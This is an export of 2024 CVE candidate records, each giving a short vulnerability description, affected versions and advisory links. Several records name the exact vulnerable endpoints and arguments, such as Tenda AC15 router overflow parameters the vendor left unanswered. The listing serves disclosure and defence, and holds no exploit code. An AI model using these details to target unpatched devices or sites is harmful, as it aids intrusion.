CVE    2024    2810    Candidate    A vulnerability has been found in Tenda AC15 15.03.05.18/15.03.20_multi and classified as critical. Affected by this vulnerability is the function formWifiWpsOOB of the file /goform/WifiWpsOOB. The manipulation of the argument index leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257665 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257665 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.257665   |   MISC:VDB-257665 | Tenda AC15 WifiWpsOOB formWifiWpsOOB stack-based overflow   |   URL:https://vuldb.com/?id.257665   |   MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/formWifiWpsOOB.md   |   URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/formWifiWpsOOB.md    Assigned (20240321)
CVE    2024    28098    Candidate    The vulnerability allows authenticated users with only produce or consume permissions to modify topic-level policies, such as retention, TTL, and offloading settings. These management operations should be restricted to users with the tenant admin role or super user role. This issue affects Apache Pulsar versions from 2.7.1 to 2.10.5, from 2.11.0 to 2.11.3, from 3.0.0 to 3.0.2, from 3.1.0 to 3.1.2, and 3.2.0. 2.10 Apache Pulsar users should upgrade to at least 2.10.6. 2.11 Apache Pulsar users should upgrade to at least 2.11.4. 3.0 Apache Pulsar users should upgrade to at least 3.0.3. 3.1 Apache Pulsar users should upgrade to at least 3.1.3. 3.2 Apache Pulsar users should upgrade to at least 3.2.1. Users operating versions prior to those listed above should upgrade to the aforementioned patched versions or newer versions.    MISC:https://lists.apache.org/thread/3m6923y3wxpdcs9346sjvt8ql9swqc2z   |   URL:https://lists.apache.org/thread/3m6923y3wxpdcs9346sjvt8ql9swqc2z   |   MISC:https://pulsar.apache.org/security/CVE-2024-28098/   |   URL:https://pulsar.apache.org/security/CVE-2024-28098/    Assigned (20240304)
CVE    2024    28097    Candidate    Calendar functionality in the Schoolbox application before version 23.1.3 is vulnerable to stored cross-site scripting, allowing an authenticated attacker to perform security actions in the context of the affected users.    MISC:https://schoolbox.education/   |   URL:https://schoolbox.education/   |   MISC:https://www.themissinglink.com.au/security-advisories/cve-2024-28097   |   URL:https://www.themissinglink.com.au/security-advisories/cve-2024-28097    Assigned (20240304)
CVE    2024    28096    Candidate    Class functionality in the Schoolbox application before version 23.1.3 is vulnerable to stored cross-site scripting, allowing an authenticated attacker to perform security actions in the context of the affected users.    MISC:https://schoolbox.education/   |   URL:https://schoolbox.education/   |   MISC:https://www.themissinglink.com.au/security-advisories/cve-2024-28096   |   URL:https://www.themissinglink.com.au/security-advisories/cve-2024-28096    Assigned (20240304)
CVE    2024    28095    Candidate    News functionality in the Schoolbox application before version 23.1.3 is vulnerable to stored cross-site scripting, allowing an authenticated attacker to perform security actions in the context of the affected users.    MISC:https://schoolbox.education/   |   URL:https://schoolbox.education/   |   MISC:https://www.themissinglink.com.au/security-advisories/cve-2024-28095   |   URL:https://www.themissinglink.com.au/security-advisories/cve-2024-28095    Assigned (20240304)
CVE    2024    28094    Candidate    Chat functionality in the Schoolbox application before version 23.1.3 is vulnerable to blind SQL injection, enabling authenticated attackers to read, modify, and delete database records.    MISC:https://schoolbox.education/   |   URL:https://schoolbox.education/   |   MISC:https://www.themissinglink.com.au/security-advisories/cve-2024-28094   |   URL:https://www.themissinglink.com.au/security-advisories/cve-2024-28094    Assigned (20240304)
CVE    2024    28093    Candidate    The TELNET service of AdTran NetVanta 3120 18.01.01.00.E devices is enabled by default, and has default credentials for a root-level account.    MISC:https://github.com/actuator/cve/blob/main/AdTran/CVE-2024-28093   |   MISC:https://github.com/actuator/cve/blob/main/AdTran/CWE-287    Assigned (20240304)
CVE    2024    28092    Candidate    UBEE DDW365 XCNDDW365 8.14.3105 software on hardware 3.13.1 allows a remote attacker within Wi-Fi proximity to conduct stored XSS attacks via RgFirewallEL.asp, RgDdns.asp, RgTime.asp, RgDiagnostics.asp, or RgParentalBasic.asp. The affected fields are SMTP Server Name, SMTP Username, Host Name, Time Server 1, Time Server 2, Time Server 3, Target, Add Keyword, Add Domain, and Add Allowed Domain.    MISC:https://github.com/actuator/cve/blob/main/Ubee/CVE-2024-28092    Assigned (20240304)
CVE    2024    2809    Candidate    A vulnerability, which was classified as critical, was found in Tenda AC15 15.03.05.18/15.03.20_multi. Affected is the function formSetFirewallCfg of the file /goform/SetFirewallCfg. The manipulation of the argument firewallEn leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257664. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257664 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.257664   |   MISC:VDB-257664 | Tenda AC15 SetFirewallCfg formSetFirewallCfg stack-based overflow   |   URL:https://vuldb.com/?id.257664   |   MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/formSetFirewallCfg.md   |   URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/formSetFirewallCfg.md    Assigned (20240321)
CVE    2024    28089    Candidate    Hitron CODA-4582 2AHKM-CODA4589 7.2.4.5.1b8 devices allow a remote attacker within Wi-Fi proximity (who has access to the router admin panel) to conduct a DOM-based stored XSS attack that can fetch remote resources. The payload is executed at index.html#advanced_location (aka the Device Location page). This can cause a denial of service or lead to information disclosure.    MISC:https://github.com/actuator/cve/blob/main/Hitron/CVE-2024-28089   |   MISC:https://github.com/actuator/cve/blob/main/Hitron/Hitron_DOM_XSS_POC.gif   |   MISC:https://github.com/actuator/cve/blob/main/Hitron/Hitron_DOM_XSS_POC_DOS_ALT.gif    Assigned (20240304)
CVE    2024    28088    Candidate    LangChain through 0.1.10 allows ../ directory traversal by an actor who is able to control the final part of the path parameter in a load_chain call. This bypasses the intended behavior of loading configurations only from the hwchase17/langchain-hub GitHub repository. The outcome can be disclosure of an API key for a large language model online service, or remote code execution. (A patch is available as of release 0.1.29 of langchain-core.)    MISC:https://github.com/PinkDraconian/PoC-Langchain-RCE/blob/main/README.md   |   MISC:https://github.com/langchain-ai/langchain/blob/f96dd57501131840b713ed7c2e86cbf1ddc2761f/libs/core/langchain_core/utils/loading.py   |   MISC:https://github.com/langchain-ai/langchain/pull/18600    Assigned (20240303)
CVE    2024    28084    Candidate    p2putil.c in iNet wireless daemon (IWD) through 2.15 allows attackers to cause a denial of service (daemon crash) or possibly have unspecified other impact because of initialization issues in situations where parsing of advertised service information fails.    FEDORA:FEDORA-2024-3fa713f2e0   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AYRPQ3OLV3GGLUCDYWBHU34DLBLM62XJ/   |   FEDORA:FEDORA-2024-4ef5edfb2a   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4KSGT4IZ23CJBOQA3AFYEMBJ5OHFZBMK/   |   MISC:https://git.kernel.org/pub/scm/network/wireless/iwd.git/commit/?id=52a47c9fd428904de611a90cbf8b223af879684d   |   MISC:https://git.kernel.org/pub/scm/network/wireless/iwd.git/commit/?id=d34b4e16e045142590ed7cb653e01ed0ae5362eb    Assigned (20240303)
CVE    2024    2808    Candidate    A vulnerability, which was classified as critical, has been found in Tenda AC15 15.03.05.18/15.03.20_multi. This issue affects the function formQuickIndex of the file /goform/QuickIndex. The manipulation of the argument PPPOEPassword leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257663. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257663 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.257663   |   MISC:VDB-257663 | Tenda AC15 QuickIndex formQuickIndex stack-based overflow   |   URL:https://vuldb.com/?id.257663   |   MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/formQuickIndex.md   |   URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/formQuickIndex.md    Assigned (20240321)
CVE    2024    28070    Candidate    A vulnerability in the legacy chat component of Mitel MiContact Center Business through 10.0.0.4 could allow an unauthenticated attacker to conduct a reflected cross-site scripting (XSS) attack due to insufficient input validation. A successful exploit could allow an attacker to access sensitive information and gain unauthorized access.    MISC:https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-24-0002    Assigned (20240301)
CVE    2024    2807    Candidate    A vulnerability classified as critical was found in Tenda AC15 15.03.05.18/15.03.20_multi. This vulnerability affects the function formExpandDlnaFile of the file /goform/expandDlnaFile. The manipulation of the argument filePath leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-257662 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257662 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.257662   |   MISC:VDB-257662 | Tenda AC15 expandDlnaFile formExpandDlnaFile stack-based overflow   |   URL:https://vuldb.com/?id.257662   |   MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/formExpandDlnaFile.md   |   URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/formExpandDlnaFile.md    Assigned (20240321)
CVE    2024    28069    Candidate    A vulnerability in the legacy chat component of Mitel MiContact Center Business through 10.0.0.4 could allow an unauthenticated attacker to conduct an information disclosure attack due to improper configuration. A successful exploit could allow an attacker to access sensitive information and potentially conduct unauthorized actions within the vulnerable component.    MISC:https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-24-0001    Assigned (20240301)
CVE    2024    2806    Candidate    A vulnerability classified as critical has been found in Tenda AC15 15.03.05.18/15.03.20_multi. This affects the function addWifiMacFilter of the file /goform/addWifiMacFilter. The manipulation of the argument deviceId/deviceMac leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257661 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257661 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.257661   |   MISC:VDB-257661 | Tenda AC15 addWifiMacFilter stack-based overflow   |   URL:https://vuldb.com/?id.257661   |   MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/addWifiMacFilter_deviceId.md   |   URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/addWifiMacFilter_deviceId.md    Assigned (20240321)
CVE    2024    28054    Candidate    Amavis before 2.12.3 and 2.13.x before 2.13.1, in part because of its use of MIME-tools, has an Interpretation Conflict (relative to some mail user agents) when there are multiple boundary parameters in a MIME email message. Consequently, there can be an incorrect check for banned files or malware.    FEDORA:FEDORA-2024-1d87055861   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6J2MK2CS3KNJOS66QLW2MBJ4PIDLWJP5/   |   FEDORA:FEDORA-2024-3cf9eb64ba   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CDF6M3UXP45INVSWB4HXEDZH35CVZIJ4/   |   FEDORA:FEDORA-2024-8bbcae6af2   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XQQQQPTZ5JHXTUCYUXZHY6RZJ6VOGOAJ/   |   MISC:https://gitlab.com/amavis/amavis/-/issues/112   |   MISC:https://gitlab.com/amavis/amavis/-/raw/v2.13.1/README_FILES/README.CVE-2024-28054   |   MISC:https://lists.amavis.org/pipermail/amavis-users/2024-March/006811.html   |   MISC:https://metacpan.org/pod/MIME::Tools   |   MISC:https://www.amavis.org/release-notes.txt    Assigned (20240301)
CVE    2024    28053    Candidate    Resource Exhaustion in Mattermost Server versions 8.1.x before 8.1.10 fails to limit the size of the payload that can be read and parsed allowing an attacker to send a very large email payload and crash the server.    MISC:https://mattermost.com/security-updates   |   URL:https://mattermost.com/security-updates    Assigned (20240314)
CVE    2024    2805    Candidate    A vulnerability was found in Tenda AC15 15.03.05.18/15.03.20_multi. It has been rated as critical. Affected by this issue is the function formSetSpeedWan of the file /goform/SetSpeedWan. The manipulation of the argument speed_dir leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257660. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257660 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.257660   |   MISC:VDB-257660 | Tenda AC15 SetSpeedWan formSetSpeedWan stack-based overflow   |   URL:https://vuldb.com/?id.257660   |   MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/SetSpeedWan.md   |   URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/SetSpeedWan.md    Assigned (20240321)
CVE    2024    28048    Candidate    OS command injection vulnerability exists in ffBull ver.4.11, which may allow a remote unauthenticated attacker to execute an arbitrary OS command with the privilege of the running web server. Note that the developer was unreachable; therefore, users should consider stopping use of ffBull ver.4.11.    MISC:https://jvn.jp/en/jp/JVN17176449/   |   URL:https://jvn.jp/en/jp/JVN17176449/    Assigned (20240305)
CVE    2024    28045    Candidate    Improper neutralization of input within the affected product could lead to cross-site scripting.    MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-12   |   URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-12    Assigned (20240312)
CVE    2024    28041    Candidate    HGW BL1500HM Ver 002.001.013 and earlier allows a network-adjacent unauthenticated attacker to execute an arbitrary command.    MISC:https://jvn.jp/en/vu/JVNVU93546510/   |   URL:https://jvn.jp/en/vu/JVNVU93546510/   |   MISC:https://www.au.com/support/service/internet/guide/modem/bl1500hm/firmware/   |   URL:https://www.au.com/support/service/internet/guide/modem/bl1500hm/firmware/    Assigned (20240318)
CVE    2024    28040    Candidate    SQL injection vulnerability exists in GetDIAE_astListParameters.    MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-12   |   URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-12    Assigned (20240312)
CVE    2024    28039    Candidate    Improper restriction of XML external entity references vulnerability exists in FitNesse all releases, which allows a remote unauthenticated attacker to obtain sensitive information, alter data, or cause a denial-of-service (DoS) condition.    MISC:http://fitnesse.org/FitNesseDownload   |   URL:http://fitnesse.org/FitNesseDownload   |   MISC:https://github.com/unclebob/fitnesse   |   URL:https://github.com/unclebob/fitnesse   |   MISC:https://github.com/unclebob/fitnesse/blob/master/SECURITY.md   |   URL:https://github.com/unclebob/fitnesse/blob/master/SECURITY.md   |   MISC:https://jvn.jp/en/jp/JVN94521208/   |   URL:https://jvn.jp/en/jp/JVN94521208/    Assigned (20240306)
CVE    2024    28034    Candidate    Cross-site scripting vulnerability exists in Mini Thread Version 3.33βi. An arbitrary script may be executed on the web browser of the user accessing the website that uses the product. Note that the developer was unreachable; therefore, users should consider stopping use of Mini Thread Version 3.33βi.    MISC:https://jvn.jp/en/jp/JVN40523785/   |   URL:https://jvn.jp/en/jp/JVN40523785/    Assigned (20240305)
CVE    2024    28033    Candidate    OS command injection vulnerability exists in WebProxy 1.7.8 and 1.7.9, which may allow a remote unauthenticated attacker to execute an arbitrary OS command with the privilege of the running web server. Note that the developer was unreachable; therefore, users should consider stopping use of WebProxy 1.7.8 and 1.7.9.    MISC:https://jvn.jp/en/jp/JVN22376992/   |   URL:https://jvn.jp/en/jp/JVN22376992/    Assigned (20240305)
CVE    2024    28029    Candidate    Privileges are not fully verified server-side, which can be abused by a user with limited privileges to bypass authorization and access privileged functionality.    MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-12   |   URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-12    Assigned (20240312)
CVE    2024    27998    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in UkrSolution Barcode Scanner with Inventory & Order Manager allows Reflected XSS. This issue affects Barcode Scanner with Inventory & Order Manager: from n/a through 1.5.3.    MISC:https://patchstack.com/database/vulnerability/barcode-scanner-lite-pos-to-manage-products-inventory-and-orders/wordpress-barcode-scanner-and-inventory-manager-plugin-1-5-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/barcode-scanner-lite-pos-to-manage-products-inventory-and-orders/wordpress-barcode-scanner-and-inventory-manager-plugin-1-5-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240229)
CVE    2024    27997    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Visualcomposer Visual Composer Website Builder allows Stored XSS. This issue affects Visual Composer Website Builder: from n/a through 45.6.0.    MISC:https://patchstack.com/database/vulnerability/visualcomposer/wordpress-visual-composer-website-builder-landing-page-builder-custom-theme-builder-maintenance-mode-coming-soon-pages-plugin-45-6-0-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/visualcomposer/wordpress-visual-composer-website-builder-landing-page-builder-custom-theme-builder-maintenance-mode-coming-soon-pages-plugin-45-6-0-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240229)
CVE    2024    27996    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Survey Maker team Survey Maker allows Stored XSS. This issue affects Survey Maker: from n/a through 4.0.5.    MISC:https://patchstack.com/database/vulnerability/survey-maker/wordpress-survey-maker-plugin-4-0-5-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/survey-maker/wordpress-survey-maker-plugin-4-0-5-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240229)
CVE    2024    27995    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Repute Infosystems ARMember – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup allows Stored XSS. This issue affects ARMember – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup: from n/a through 4.0.23.    MISC:https://patchstack.com/database/vulnerability/armember-membership/wordpress-armember-plugin-4-0-23-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/armember-membership/wordpress-armember-plugin-4-0-23-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240229)
CVE    2024    27994    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in YITH YITH WooCommerce Product Add-Ons allows Reflected XSS. This issue affects YITH WooCommerce Product Add-Ons: from n/a through 4.5.0.    MISC:https://patchstack.com/database/vulnerability/yith-woocommerce-product-add-ons/wordpress-yith-woocommerce-product-add-ons-plugin-4-5-0-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/yith-woocommerce-product-add-ons/wordpress-yith-woocommerce-product-add-ons-plugin-4-5-0-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240229)
CVE    2024    27993    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Typps Calendarista Basic Edition. This issue affects Calendarista Basic Edition: from n/a through 3.0.2.    MISC:https://patchstack.com/database/vulnerability/calendarista-basic-edition/wordpress-calendarista-basic-edition-plugin-3-0-2-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/calendarista-basic-edition/wordpress-calendarista-basic-edition-plugin-3-0-2-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240229)
CVE    2024    27992    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Link Whisper Link Whisper Free allows Reflected XSS. This issue affects Link Whisper Free: from n/a through 0.6.8.    MISC:https://patchstack.com/database/vulnerability/link-whisper/wordpress-link-whisper-free-plugin-0-6-8-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/link-whisper/wordpress-link-whisper-free-plugin-0-6-8-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240229)
CVE    2024    27991    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SupportCandy allows Stored XSS. This issue affects SupportCandy: from n/a through 3.2.3.    MISC:https://patchstack.com/database/vulnerability/supportcandy/wordpress-supportcandy-plugin-3-2-3-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/supportcandy/wordpress-supportcandy-plugin-3-2-3-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240229)
CVE    2024    27990    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in The Moneytizer allows Stored XSS. This issue affects The Moneytizer: from n/a through 9.5.20.    MISC:https://patchstack.com/database/vulnerability/the-moneytizer/wordpress-the-moneytizer-plugin-9-5-20-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/the-moneytizer/wordpress-the-moneytizer-plugin-9-5-20-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240229)
CVE    2024    27989    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in I Thirteen Web Solution WP Responsive Tabs horizontal vertical and accordion Tabs allows Stored XSS. This issue affects WP Responsive Tabs horizontal vertical and accordion Tabs: from n/a through 1.1.17.    MISC:https://patchstack.com/database/vulnerability/responsive-horizontal-vertical-and-accordion-tabs/wordpress-wp-responsive-tabs-horizontal-vertical-and-accordion-tabs-plugin-1-1-17-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/responsive-horizontal-vertical-and-accordion-tabs/wordpress-wp-responsive-tabs-horizontal-vertical-and-accordion-tabs-plugin-1-1-17-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240229)
CVE    2024    27988    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WEN Themes WEN Responsive Columns allows Stored XSS. This issue affects WEN Responsive Columns: from n/a through 1.3.2.    MISC:https://patchstack.com/database/vulnerability/wen-responsive-columns/wordpress-wen-responsive-columns-plugin-1-3-2-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/wen-responsive-columns/wordpress-wen-responsive-columns-plugin-1-3-2-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240229)
CVE    2024    27987    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in GiveWP Give allows Reflected XSS. This issue affects Give: from n/a through 3.3.1.    MISC:https://patchstack.com/database/vulnerability/give/wordpress-give-plugin-3-3-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/give/wordpress-give-plugin-3-3-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240229)
CVE    2024    27986    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Livemesh Elementor Addons by Livemesh allows Stored XSS. This issue affects Elementor Addons by Livemesh: from n/a through 8.3.5.    MISC:https://patchstack.com/database/vulnerability/addons-for-elementor/wordpress-elementor-addons-by-livemesh-plugin-8-3-5-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/addons-for-elementor/wordpress-elementor-addons-by-livemesh-plugin-8-3-5-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240229)
CVE    2024    27985    Candidate    Deserialization of Untrusted Data vulnerability in PropertyHive. This issue affects PropertyHive: from n/a through 2.0.9.    MISC:https://patchstack.com/database/vulnerability/propertyhive/wordpress-propertyhive-plugin-2-0-9-php-object-injection-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/propertyhive/wordpress-propertyhive-plugin-2-0-9-php-object-injection-vulnerability?_s_id=cve    Assigned (20240229)
CVE    2024    27974    Candidate    Cross-site request forgery vulnerability in FUJIFILM printers which implement CentreWare Internet Services or Internet Services allows a remote unauthenticated attacker to alter user information. In the case the user is an administrator, the settings such as the administrator's ID, password, etc. may be altered. As for the details of affected product names, model numbers, and versions, refer to the information provided by the vendor listed under [References].    MISC:https://jvn.jp/en/jp/JVN34328023/   |   URL:https://jvn.jp/en/jp/JVN34328023/   |   MISC:https://www.fujifilm.com/fbglobal/eng/company/news/notice/2024/0306_1_announce.html   |   URL:https://www.fujifilm.com/fbglobal/eng/company/news/notice/2024/0306_1_announce.html    Assigned (20240228)
CVE    2024    27970    Candidate    Missing Authorization vulnerability in BogdanFix WP SendFox. This issue affects WP SendFox: from n/a through 1.3.0.    MISC:https://patchstack.com/database/vulnerability/wp-sendfox/wordpress-wp-sendfox-plugin-1-3-0-broken-access-control-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/wp-sendfox/wordpress-wp-sendfox-plugin-1-3-0-broken-access-control-vulnerability?_s_id=cve    Assigned (20240228)
CVE    2024    27969    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Enhanced Free Downloads WooCommerce allows Stored XSS. This issue affects Free Downloads WooCommerce: from n/a through 3.5.8.2.    MISC:https://patchstack.com/database/vulnerability/download-now-for-woocommerce/wordpress-free-downloads-woocommerce-plugin-3-5-8-2-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/download-now-for-woocommerce/wordpress-free-downloads-woocommerce-plugin-3-5-8-2-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240228)
CVE    2024    27968    Candidate    Cross-Site Request Forgery (CSRF) vulnerability in Optimole Super Page Cache for Cloudflare allows Stored XSS. This issue affects Super Page Cache for Cloudflare: from n/a through 4.7.5.    MISC:https://patchstack.com/database/vulnerability/wp-cloudflare-page-cache/wordpress-super-page-cache-for-cloudflare-plugin-4-7-5-cross-site-request-forgery-csrf-to-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/wp-cloudflare-page-cache/wordpress-super-page-cache-for-cloudflare-plugin-4-7-5-cross-site-request-forgery-csrf-to-xss-vulnerability?_s_id=cve    Assigned (20240228)
CVE    2024    27967    Candidate    Cross-Site Request Forgery (CSRF) vulnerability in Michael Leithold DSGVO All in one for WP. This issue affects DSGVO All in one for WP: from n/a through 4.3.    MISC:https://patchstack.com/database/vulnerability/dsgvo-all-in-one-for-wp/wordpress-dsgvo-all-in-one-for-wp-plugin-4-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/dsgvo-all-in-one-for-wp/wordpress-dsgvo-all-in-one-for-wp-plugin-4-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve    Assigned (20240228)
CVE    2024    27966    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ExpressTech Quiz And Survey Master allows Stored XSS. This issue affects Quiz And Survey Master: from n/a through 8.2.2.    MISC:https://patchstack.com/database/vulnerability/quiz-master-next/wordpress-quiz-and-survey-master-plugin-8-2-2-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/quiz-master-next/wordpress-quiz-and-survey-master-plugin-8-2-2-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240228)
CVE    2024    27965    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPFunnels Team WPFunnels allows Stored XSS. This issue affects WPFunnels: from n/a through 3.0.6.    MISC:https://patchstack.com/database/vulnerability/wpfunnels/wordpress-wpfunnels-plugin-3-0-6-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/wpfunnels/wordpress-wpfunnels-plugin-3-0-6-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240228)
CVE    2024    27964    Candidate    Unrestricted Upload of File with Dangerous Type vulnerability in Gesundheit Bewegt GmbH Zippy. This issue affects Zippy: from n/a through 1.6.9.    MISC:https://patchstack.com/database/vulnerability/zippy/wordpress-zippy-plugin-1-6-9-arbitrary-file-upload-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/zippy/wordpress-zippy-plugin-1-6-9-arbitrary-file-upload-vulnerability?_s_id=cve    Assigned (20240228)
CVE    2024    27963    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Crisp allows Stored XSS. This issue affects Crisp: from n/a through 0.44.    MISC:https://patchstack.com/database/vulnerability/crisp/wordpress-crisp-live-chat-and-chatbot-plugin-0-44-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/crisp/wordpress-crisp-live-chat-and-chatbot-plugin-0-44-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240228)
CVE    2024    27962    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Florian 'fkrauthan' Krauthan allows Reflected XSS. This issue affects wp-mpdf: from n/a through 3.7.1.    MISC:https://patchstack.com/database/vulnerability/wp-mpdf/wordpress-wp-mpdf-plugin-3-7-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/wp-mpdf/wordpress-wp-mpdf-plugin-3-7-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240228)
